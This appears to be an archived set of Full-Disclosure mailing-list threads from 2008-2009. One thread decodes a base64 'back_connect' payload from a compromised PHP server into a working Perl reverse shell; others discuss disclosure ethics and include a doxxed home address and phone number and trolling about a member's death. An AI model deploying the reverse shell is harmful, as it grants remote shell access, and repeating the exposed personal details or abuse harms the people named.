Re: [Full-disclosure] connect back PHP hack
Can you send me the entire package, I'm interested in whatever it is that was uploaded to your box. On Feb 10, 2009, at 1:23 PM, sr. wrote: can anyone tell me what encoding this is? $ back_connect = IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith si...@snosoft.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] connect back PHP hack
Damn you! I hate being wrong! I'm going to go stand in my corner and pout now. On Feb 10, 2009, at 1:58 PM, Razi Shaban wrote: On Tue, Feb 10, 2009 at 8:51 PM, Simon Smith si...@snosoft.com wrote: Technically it doesn't decrypt to anything, it decodes. :) According to the Federal Standard 1037C, the National Information Systems Security Glossary, and the Department of Defense Dictionary of Military and Associated Terms: In telecommunications, the term decrypt has the following meanings: 1. [A] generic term encompassing decode and decipher. 2. To convert encrypted text into its equivalent plaintext by means of a cryptosystem. http://en.wikipedia.org/wiki/Decrypt So no, I mean decrypt. Regards, Razi Shaban Simon Smith si...@snosoft.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] connect back PHP hack
Technically it doesn't decrypt to anything, it decodes. :)
On Feb 10, 2009, at 1:44 PM, Razi Shaban wrote:
On Tue, Feb 10, 2009 at 8:23 PM, sr. static...@gmail.com wrote:
can anyone tell me what encoding this is?
$
back_connect
=
IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==;
this has to do with old php 4.x.x version with magic quotes enabled.
i'm just trying to figure out what the connect back code does.
any input is much appreciated.
thx,
sr.
Base64, the == at the end gives it away. It decrypts to:
#!/usr/bin/perl
use Socket;
$cmd= lynx;
$system= 'echo `uname -a`;echo `id`;/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die(Error: $!\n);
$paddr=sockaddr_in($port, $iaddr) || die(Error: $!\n);
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n);
connect(SOCKET, $paddr) || die(Error: $!\n);
open(STDIN, SOCKET);
open(STDOUT, SOCKET);
open(STDERR, SOCKET);
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
--
Regards,
Razi Shaban
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Simon Smith
si...@snosoft.com
--
Subscribe to our blog
http://snosoft.blogspot.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The war in Palestine
Allaa, Frankly I think that the entire thing is silly. We're human beings made up of the same flesh, blood and bone. We all come from the exact same source regardless of what name we give it. The same bullet that can kill me can kill you and the resulting family pains would also be similar. Its a war not worth fighting for either side, just be present and enjoy the life that you can have instead of making it miserable by focusing on the past which can not be changed and the future which will never exist. The future is just a projection from your imagination but the present is where you're living. If you're unhappy with where you are in the present then you haven't been living in the present properly. God I sound like a monk or something... On Jan 4, 2009, at 6:10 AM, Alaa Abdelwahab wrote: Dear All While I believe this is not the best place to discuss this subject, and it will be my first post ever, but you really gave me a very good reason to send this mail. I do recommend every one to read the history to know why rockets are lunched from Gaza toward the “Israeli” lands, and what the Israeli troops are really doing. You do not have time ? yes even sometime I don’t have enough time to read my own mails. I will try to help, have a look on this map image001.jpg Do you understand why the small green areas are attacking the white ones ?? If you don’t like to think about it and maybe we are all technical ppl who really only understand numbers? I will help as well In the last 8 years there were 5000 rockets (if we can really call it rockets) launched from the green areas killed “5” and wounded “15” and captured “1” ppl who lives in the white lands. So the ppl from the white areas answer by killing “5000” and wounded “15” and capture more than “2” ppl from the green areas (7% of these number are only in the last 7 days). Maybe I will try to help more after 10 years from now by sending another Map, and lets discuss then why the Palestinians didn’t resist to exist, if we will remember if there was a country called Palestine, which used to own the whole green and white lands only 70 years ago I hope that I didn’t take much time from you all. Brgds…Alaa ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith si...@snosoft.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Penetration testing will be dead by 2009 - Mr. Chess
http://snosoft.blogspot.com/2008/12/brian-chess-cto-of-fortify-software.html Simon Smith si...@snosoft.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cyber attacks in alphabetical order? Estonia, Georgia analysis
omigawd gadi! n3td3v wrote: I've noticed these cyber attacks are in alphabetical order, E, G. Also, if you turn E, G around you get the initials of Gadi Evron. ;) All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] To disclose or not to disclose
Great replies guys! So lets take this a step further. Lets suppose (again just theory) that the security company did notify the software vendor and did tell the vendor where the security issues were in their technology, how to exploit the issues, provided a proof of concept, and provided clear and actionable methods for remediation. Lets then say that the software vendor flat out, point blank, rejected that information and refused to implement any fixes. Just to make this more interesting, lets say that this all happened over one year ago. Lets also say that the customer who was being tested by the security company and that is using the vulnerable software has yet to address the vulnerability in their own network too. Is it the ethical duity of the security company to release an advisory? Does that advisory put the customer at risk? It is clearly unethical to do nothing and to leave everyone else at risk. How to proceed? AaRoNg11 wrote: On Sat, Sep 27, 2008 at 9:13 AM, AaRoNg11 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Hey, this is a situation that occurs quite frequently within the security industry. (Bad) Vendors often refuse to fix bugs or ignore them completely until it's too late. You should ideally assess each situation on a case by case basis. Ideally, the first step should be to notify the vendor giving them as much technical information about the bug as possible. You should also document the severity of the bug, and give the vendor some examples of what a malicious user would be able to do. If the vendor has not responded within 5 weeks, the second step should be to create an extremely generic public advisory. This advisory should explain what the bug allows a malicious user to do, while not detailing the technical aspects. By doing this, you are letting the industry know that the software is vulnerable, and it would be a good idea to start looking at possible alternatives. It is at this point that you should set a deadline for your public disclosure of the full advisory. This will put pressure on the vendor to get a patch out ASAP. A few days before the deadline, you should try to release a fix for the affected product yourself. Obviously this is only possible with open source software. Most people that use mission critical software (such as hospitals etc) will be signed up to at least one security mailing list. By doing this, you give them a chance to patch the bug before the script kiddies get in. While it may be possible to recreate the exploit from the patched code, it is unlikely that anybody will be able to rush anything out in the few days before the public advisory. On Sat, Sep 27, 2008 at 4:39 AM, Simon Smith [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Greetings, I have a theoretical question of ethics for other security professionals that participate in this list. This is not an actual situation, but it is a potentially realistic situation that I'm interested in exploring and finding an acceptable solution to. Supposed a penetration testing company delivers a service to a customer. That customer uses a technology that was created by a third party to host a critical component of their infrastructure. The penetration testing company identifies several critical flaws in the technology and notifies the customer, and the vendor. One year passes and the vendor had done nothing to fix the issue. The customer is still vulnerable and they have done nothing to change their level of risk and exposure. In fact, lets say that the vendor flat out refuses to do anything about the issue even though they have been notified of the problem. Lets also assume that this issue affects thousands of customers in the financial and medical industry and puts them at dire risk. What should the security company do? 1-) Create a formal advisory, contact the vendor and notify them of the intent to release the advisory in a period of n days? If the vendor refuses to fix the issue does the security company still release the advisory in n days? Is that protecting the customer or putting the customer at risk? Or does it even change the risk level as their risk still exists. 2-) Does the security company collect a list of users of the technology and notify those users one by one? The process might be very time consuming but by doing that the security company might not increase the risk faced by the users of the technology
Re: [Full-disclosure] To disclose or not to disclose
Elazar, I suppose that could be a good action, but doing that would potentially put the security companies customer at risk. Granted, in the argument they were already notified of the risk. So the question is, is that the ethical choice? Is that a good business choice? Elazar Broad wrote: I would opt for #1, additionally, contacting CERT and other quasi- government security organizations would be a plus, they might have better luck lighting a fire under the theoretical vendors ass... elazar On Sat, 27 Sep 2008 03:39:34 + Simon Smith [EMAIL PROTECTED] wrote: Greetings, I have a theoretical question of ethics for other security professionals that participate in this list. This is not an actual situation, but it is a potentially realistic situation that I'm interested in exploring and finding an acceptable solution to. Supposed a penetration testing company delivers a service to a customer. That customer uses a technology that was created by a third party to host a critical component of their infrastructure. The penetration testing company identifies several critical flaws in the technology and notifies the customer, and the vendor. One year passes and the vendor had done nothing to fix the issue. The customer is still vulnerable and they have done nothing to change their level of risk and exposure. In fact, lets say that the vendor flat out refuses to do anything about the issue even though they have been notified of the problem. Lets also assume that this issue affects thousands of customers in the financial and medical industry and puts them at dire risk. What should the security company do? 1-) Create a formal advisory, contact the vendor and notify them of the intent to release the advisory in a period of n days? If the vendor refuses to fix the issue does the security company still release the advisory in n days? Is that protecting the customer or putting the customer at risk? Or does it even change the risk level as their risk still exists. 2-) Does the security company collect a list of users of the technology and notify those users one by one? The process might be very time consuming but by doing that the security company might not increase the risk faced by the users of the technology, will they? 3-) Does the security company release a low level advisory that notifies users of the technology to contact the vendor in order to gain access to the technical details about the issue? 4-) Does the security company do something else? If so, what is the appropriate course of action? 5-) Does the security company do nothing? I'm very interested to hear what people thin the responsible action would be here. It appears that this is a challenge that will at some level create risk for the customer. Is it impossible to do this without creating an unacceptable level of risk? Looking forward to real responses (and troll responses too... especially n3td3v). -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Self Storage Options - Click Here. http://tagline.hushmail.com/fc/Ioyw6h4eNgR1BRhFB3CXCR61VEtfAqJ45ZV34qDMKcjsXBCGM0kWG5/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] To disclose or not to disclose
Greetings, I have a theoretical question of ethics for other security professionals that participate in this list. This is not an actual situation, but it is a potentially realistic situation that I'm interested in exploring and finding an acceptable solution to. Supposed a penetration testing company delivers a service to a customer. That customer uses a technology that was created by a third party to host a critical component of their infrastructure. The penetration testing company identifies several critical flaws in the technology and notifies the customer, and the vendor. One year passes and the vendor had done nothing to fix the issue. The customer is still vulnerable and they have done nothing to change their level of risk and exposure. In fact, lets say that the vendor flat out refuses to do anything about the issue even though they have been notified of the problem. Lets also assume that this issue affects thousands of customers in the financial and medical industry and puts them at dire risk. What should the security company do? 1-) Create a formal advisory, contact the vendor and notify them of the intent to release the advisory in a period of n days? If the vendor refuses to fix the issue does the security company still release the advisory in n days? Is that protecting the customer or putting the customer at risk? Or does it even change the risk level as their risk still exists. 2-) Does the security company collect a list of users of the technology and notify those users one by one? The process might be very time consuming but by doing that the security company might not increase the risk faced by the users of the technology, will they? 3-) Does the security company release a low level advisory that notifies users of the technology to contact the vendor in order to gain access to the technical details about the issue? 4-) Does the security company do something else? If so, what is the appropriate course of action? 5-) Does the security company do nothing? I'm very interested to hear what people thin the responsible action would be here. It appears that this is a challenge that will at some level create risk for the customer. Is it impossible to do this without creating an unacceptable level of risk? Looking forward to real responses (and troll responses too... especially n3td3v). -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DIE IN A FIRE post
Hi Mike, Next time you decide to say something stupid make sure that you do it anonymously. Michael C Shirk Home: 4205 Chapel Gate Pl Belcamp, MD 21017-1636 (410) 273-1377 M. Shirk wrote: DIE IN A FIRE !!!1!1! Shirkdog ' or 1=1-- http://www.shirkdog.us Date: Tue, 26 Aug 2008 18:59:06 -0700 From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] test post test Talk to your Yahoo! Friends via Windows Live Messenger. Find Out How http://www.windowslive.com/explore/messenger?ocid=TXT_TAGLM_WL_messenger_yahoo_082008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DIE IN A FIRE post
You must be a bureaucrat. Randal T. Rioux wrote: On Wed, August 27, 2008 11:34 am, Simon Smith wrote: Hi Mike, Next time you decide to say something stupid make sure that you do it anonymously. Michael C Shirk Home: 4205 Chapel Gate Pl Belcamp, MD 21017-1636 (410) 273-1377 M. Shirk wrote: DIE IN A FIRE !!!1!1! Shirkdog ' or 1=1-- http://www.shirkdog.us Simon: A: Because it messes up the order in which people normally read text. Q: Why is top-posting such a bad thing? A: Top-posting. Q: What is the most annoying thing in e-mail? Shirkdog: Seems we share a state. Ask the evil hacker Simon for my address - come on over. I'll back a cake. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wow.
And people wonder why they get pwned all the time... Charles Morris wrote: http://www.sowela.edu/elearning.html ... comments? -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] wow.
Marcin my man, go back and re-read the email... specifically his signature. If you don't get it... well then abandon all hope. ;] Marcin Wielgoszewski wrote: Logon to non-ssl site, password is same as username, username convention is described right on the site... On Wed, May 28, 2008 at 4:45 PM, Arshan Dabirsiaghi [EMAIL PROTECTED] wrote: What's the issue here? I don't see any problem. Sincerely, swadabirsiaghi64 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Charles Morris Sent: Wednesday, May 28, 2008 4:38 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] wow. http://www.sowela.edu/elearning.html ... comments? -- Charles Morris [EMAIL PROTECTED], [EMAIL PROTECTED] Network Security Administrator, Software Developer Office of Computing and Communications Services, CS Systems Group Old Dominion University http://www.cs.odu.edu/~cmorris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ M -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ford Motors IT Contact
In response to them still being infected with sql slammer and it probing my networks regularly. Nate McFeters wrote: Is this in response to a vulnerability to report, or in response to some other form of abuse, like spam? -Nate On 5/27/08, *Gary Wilson* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: On Tue, May 27, 2008 16:46, Simon Smith wrote: Does anyone here have a contact for Ford Motors IT Department, Specifically for abuse? -- Europe, or US? And in relation to their online activities or other? When I was on my placement year, I did all of Ford Europe's website and I was employed by the Marketting company Winderman Cato Johnson - so I guess contacting them if it's Europe and to do with their online prescence. Things may have changed, but a quick google suggests Wunderman are still heavilly involved with Ford, Europe. HTH GW -- / Gary Wilson, aka dragon/dragonlord/dragonv480\ .'(_.--. e: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] MSN: dragonv480 .--._)`. _ | Skype:dragonv480 ICQ:342070475 AIM:dragonv480 | _ `.( `--' w: http://volvo480.northernscum.org.uk `--' ).' \w: http://www.northernscum.org.uk / ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ford Motors IT Contact
Indeed, that is the IP address. That IP address appears to be bound to some sort of a VPN system for ford. Perhaps its infected VPN users? Michael Holstein wrote: In response to them still being infected with sql slammer and it probing my networks regularly. Let me guess .. it's 136.1.7.55 ? Here's what I get (from ford) every time that IP pops up in our automated abuse report .. --snip-- Our investigation into this matter has determined that the recent onset of attacks from this IP is the result of the IP being forged by an external party. External parties will commonly use IP addresses that belong to large organizations to mask network traffic. --snip-- Cheers, Michael Holstein Cleveland State University -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Snort Signature to detect credit cards
You sure you got that URL right? Ray P wrote: The free rule sets from http://www.emergingthreats.com have this capability. Look in the Policy section. RAy From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Date: Thu, 8 May 2008 12:44:15 -0600 Subject: [Full-disclosure] Snort Signature to detect credit cards Does anyone have a snort signature to detect credit cards or social security numbers? Thank you in advance, Jeff Get Free (PRODUCT) RED™ Emoticons, Winks and Display Pics. Check it out! http://joinred.spaces.live.com?ocid=TXT_HMTG_prodredemoticons_052008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] We've shut down the Exploit Acquisition Program
If you're interested you can read about it here: http://snosoft.blogspot.com/2008/03/exploit-acquisition-program-shut-down.html -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anyone else seeing this?
Thats because you've been writing less you moron. Joey Mengele wrote: SPAM levels greatly decreased on my servers since Dude Van Doornail kicked the bucket. Can anyone else confirm this on their equipment? -- A Trip To New York City Sweepstakes Enter for your chance to WIN a trip to New York City with Total Beauty http://tagline.hushmail.com/fc/JKFkuIjyOohmmvgluZ1QtMYaak2ByUn6j92FK3RZIiGHlZ38H0ZXFu/ J ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?
Again, It wasn't an assumption, it was a suggestion. J. Oquendo wrote: Simon Smith wrote: Ok, Big deal I typed it wrong once. More significantly, your interpretation of what I wrote is inaccurate. Why are you supporting the trolls? Did you see any support of any trolls? I stay out of trolling. Besides death is death, its a sad loss but life moves on. People come, people go, had I known him I'd make a comment to no one on a public forum since it wouldn't be the right medium. Maybe flowers or a condolence card to his family would have been my route. I have little time for trolling especially to spit on someone who's not around to defend himself. I've no opinion of JP other then he seemed to be a knowledgeable person unlike many a poster here. I don't play the suck up game either he will be greatly missed. I'm sure his family and friends will miss him and I hope they cherish his memory lest they become robots, as for me, I didn't know him to make a comment. My comment was towards you and your incorrect ASSumption of law. -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?
Ok, Big deal I typed it wrong once. More significantly, your interpretation of what I wrote is inaccurate. Why are you supporting the trolls? RB wrote: At least spell 'Libel' correctly for anyone to take you seriously. You should know vain threats won't help the matter, and will frankly only encourage the trolls to continue. Yes, they are egregiously immature and offend you in the wake of DvW's death, but that doesn't make them any different than the trolls they were two weeks ago. Let it go, man - it's a fight you can't win unless you have deeper pockets and more political power than all of corporate Amerika combined. -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brute force attack - need your advice
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Show me proof that you're not talking out of your ass. Andrew A wrote: | How: fistfull of barbituates | Why: he was a fucking failure | | On Feb 12, 2008 9:15 AM, Simon Smith [EMAIL PROTECTED] | mailto:[EMAIL PROTECTED] wrote: | | Anyone find any info on how or why Dude passed on? | | | [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: | On Tue, 12 Feb 2008 03:21:20 EST, Keith Kilroy said: | | The only box that is safe is the one unplugged hdd removed and | destroyed and rest of system locked in a closet. | | Actually, no. :) Some clever guys at UIUC managed to get a | quantum CPU | that wasn't powered on to do some calculations *anyhow*: | | http://www.newscientist.com/channel/info-tech/mg18925405.700.html | | Now, if the program run while it's turned off has an exploitable | bug in it. | | | | - | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ | | | -- | | - simon | | -- | http://www.snosoft.com | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ | | - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHsfrNf3Elv1PhzXgRAvDQAJ44euu+uYX7YC5ssJCczBSs6nLyjwCgwYjO uN6XJfH8BVs6bSf5VmzDoS0= =D3FQ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Disrespecting the respectable Dude VanWinkle / Justin Plazzo, illegal?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 FYI, Lible: An untruthful statement about a person, published in writing or through broadcast media, that injures the person's reputation or standing in the community. Because libel is a tort (a civil wrong), the injured person can bring a lawsuit against the person who made the false statement. Libel is a form of defamation , as is slander (an untruthful statement that is spoken, but not published in writing or broadcast through the media). I'll bet that JP's family can file a lawsuit against the socially dysfunctional idiots that are tarnishing JP's name. Especially since JP is deceased. As a result they should be able to subpoena the ISP's and providers and track these emails back to the places of employment from which they are being sent. (Or their parents houses.) I think that JP's family should very seriously consider this option. I know of a few very good law firms that will work on a percentage with a small deposit. - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHsfpWf3Elv1PhzXgRAsRsAJ9grPyfX5iQtilz+gvfX90JfHGrxQCggxZH RflRkw6axEvHSOuEs21ZbpU= =E9mS -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brute force attack - need your advice
Anyone find any info on how or why Dude passed on? [EMAIL PROTECTED] wrote: On Tue, 12 Feb 2008 03:21:20 EST, Keith Kilroy said: The only box that is safe is the one unplugged hdd removed and destroyed and rest of system locked in a closet. Actually, no. :) Some clever guys at UIUC managed to get a quantum CPU that wasn't powered on to do some calculations *anyhow*: http://www.newscientist.com/channel/info-tech/mg18925405.700.html Now, if the program run while it's turned off has an exploitable bug in it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] in Memory of Dude VanWinkle / Justin Plazzo
What does it take in terms of resources to run a list like Full Disclosure? Does anyone have a head count or a list of resources? -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Dude VanWinkle's Death
Joey, here's a pic of you that I took on that special day! http://www.movv.com/prvupload/uploads/super_retard_stfu.jpg Paul Schmehl wrote: --On Monday, February 11, 2008 13:10:09 -0500 Joey Mengele [EMAIL PROTECTED] wrote: LOLOLOL. PICS PICS! I wouldn't have thought that his death would be a laughing matter. Considering he was only 31, it's rather tragic. (And no, the original post was not a joke, and yes, he really did die.) -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Dude VanWinkle's Death
Joey, For a retard your quasi email forging skills are impressive. You're l33t even! Joey Mengele wrote: LOLOLOLOL. J On Mon, 11 Feb 2008 13:18:21 -0500 Simon Smith [EMAIL PROTECTED] wrote: Hey Joey, he was a prick but christ man, lay off, he is dead! Joey Mengele wrote: LOLOLOL. PICS PICS! J On Mon, 11 Feb 2008 10:40:33 -0500 Jonathan Glass [EMAIL PROTECTED] wrote: http://www.timesreporter.com/index.php?ID=79446r=6Category=7 Justin Marcus Polazzo, 31, of Atlanta, Ga., was found dead in his home on Feb. 4, 2008. He was born in Alma, Mich., on Dec. 31, 1976. At the time of his death, Justin was employed at the Georgia Institute of Technology's Office of Information Technology in the Division of Architecture and Infrastructure. Justin is survived by his parents, mother Carol Anson Stanwyck (Doug), and father Free Polazzo (Janet), brother Chad Polazzo (Lori), and stepsister Liz Stanwyck. Other area surviving relatives are Betty Anson, Wendy (Wagner) Muzechuk, Ashley and Maggie Haverfield and James Anson (Marilyn) from Illinois. A memorial service will be held Sunday, Feb. 10, 2008, in Atlanta. It's been a sad week for the friends of Dude VanWinkle. -- Click for information on obtaining a VA loan. http://tagline.hushmail.com/fc/Ioyw6h4d9CvfKbqV1QpBLhpA2GafKsTOCj8X MF8GoZgmuCFoovKvc0/ --JG ___ 